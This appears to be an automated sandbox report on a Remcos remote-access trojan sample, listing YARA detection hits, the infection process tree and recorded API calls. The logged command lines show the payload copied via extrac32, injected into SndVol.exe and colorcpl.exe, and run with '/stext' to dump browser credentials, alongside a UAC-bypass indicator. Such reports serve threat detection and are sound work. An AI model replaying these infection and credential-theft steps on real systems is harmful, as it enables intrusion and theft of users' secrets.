                    Source: 13.2.colorcpl.exe.6f80000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 13.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 13.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 13.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0000000D.00000002.2251885365.0000000006F80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0000000D.00000002.2251885365.0000000006F80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 0000000D.00000002.2251885365.0000000006F80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0000000D.00000002.2247045059.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0000000D.00000002.2247045059.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 0000000D.00000002.2247045059.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: Process Memory Space: SndVol.exe PID: 6352, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: colorcpl.exe PID: 5900, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winEXE@21/6@3/3
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 4_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,4_2_004182CE
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,3_2_00417952
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0536861F GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,3_2_0536861F
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: 0_2_02907F4A GetDiskFreeSpaceA,0_2_02907F4A
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: 0_2_0291A12C CreateToolhelp32Snapshot,0_2_0291A12C
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0041B4A8 FindResourceA,LoadResource,LockResource,SizeofResource,3_2_0041B4A8
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,3_2_0041AA4A
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeFile created: C:\Users\Public\Jsqwmpul.urlJump to behavior
                    Source: C:\Windows\SysWOW64\SndVol.exeMutant created: \Sessions\1\BaseNamedObjects\Windows Volume App Window
                    Source: C:\Windows\SysWOW64\SndVol.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-TLPQMO
                    Source: C:\Windows\SysWOW64\SndVol.exeFile created: C:\Users\user\AppData\Local\Temp\bhv3259.tmpJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Windows\SysWOW64\SndVol.exeSystem information queried: HandleInformationJump to behavior
                    Source: C:\Windows\SysWOW64\SndVol.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: SndVol.exe, SndVol.exe, 00000004.00000002.2047662271.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: SndVol.exe, SndVol.exe, 00000007.00000002.2029658466.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: SndVol.exe, 00000003.00000002.4420280091.000000001F0E0000.00000040.10000000.00040000.00000000.sdmp, SndVol.exe, 00000004.00000002.2047662271.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                    Source: SndVol.exe, SndVol.exe, 00000004.00000002.2047662271.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                    Source: SndVol.exe, SndVol.exe, 00000004.00000002.2047662271.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: SndVol.exe, SndVol.exe, 00000004.00000002.2047662271.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: SndVol.exe, 00000004.00000003.2047281585.00000000031FD000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000004.00000002.2048056679.00000000031FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: SndVol.exe, SndVol.exe, 00000004.00000002.2047662271.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: HGTQP09643009.scr.exeReversingLabs: Detection: 60%
                    Source: HGTQP09643009.scr.exeVirustotal: Detection: 60%
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeFile read: C:\Users\user\Desktop\HGTQP09643009.scr.exeJump to behavior
                    Source: C:\Windows\SysWOW64\SndVol.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
                    Source: unknownProcess created: C:\Users\user\Desktop\HGTQP09643009.scr.exe "C:\Users\user\Desktop\HGTQP09643009.scr.exe"
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\HGTQP09643009.scr.exe C:\\Users\\Public\\Libraries\\Jsqwmpul.PIF
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
                    Source: C:\Windows\SysWOW64\SndVol.exeProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\user\AppData\Local\Temp\xkjscr"
                    Source: C:\Windows\SysWOW64\SndVol.exeProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\user\AppData\Local\Temp\hfwldkaiv"
                    Source: C:\Windows\SysWOW64\SndVol.exeProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\user\AppData\Local\Temp\hfwldkaiv"
                    Source: C:\Windows\SysWOW64\SndVol.exeProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\user\AppData\Local\Temp\hfwldkaiv"
                    Source: C:\Windows\SysWOW64\SndVol.exeProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\user\AppData\Local\Temp\jhbdectkjqlx"
                    Source: unknownProcess created: C:\Users\Public\Libraries\Jsqwmpul.PIF "C:\Users\Public\Libraries\Jsqwmpul.PIF"
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
                    Source: C:\Windows\SysWOW64\SndVol.exeProcess created: C:\Users\Public\Libraries\Jsqwmpul.PIF "C:\Users\Public\Libraries\Jsqwmpul.PIF"
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\HGTQP09643009.scr.exe C:\\Users\\Public\\Libraries\\Jsqwmpul.PIFJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exeJump to behavior
                    Source: C:\Windows\SysWOW64\SndVol.exeProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\user\AppData\Local\Temp\xkjscr"Jump to behavior
                    Source: C:\Windows\SysWOW64\SndVol.exeProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\user\AppData\Local\Temp\hfwldkaiv"Jump to behavior
                    Source: C:\Windows\SysWOW64\SndVol.exeProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\user\AppData\Local\Temp\hfwldkaiv"Jump to behavior
                    Source: C:\Windows\SysWOW64\SndVol.exeProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\user\AppData\Local\Temp\hfwldkaiv"Jump to behavior
                    Source: C:\Windows\SysWOW64\SndVol.exeProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\user\AppData\Local\Temp\jhbdectkjqlx"Jump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exeJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: cabinet.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: archiveint.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: url.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ieframe.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: smartscreenps.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: sspicli.dllJump to behavior
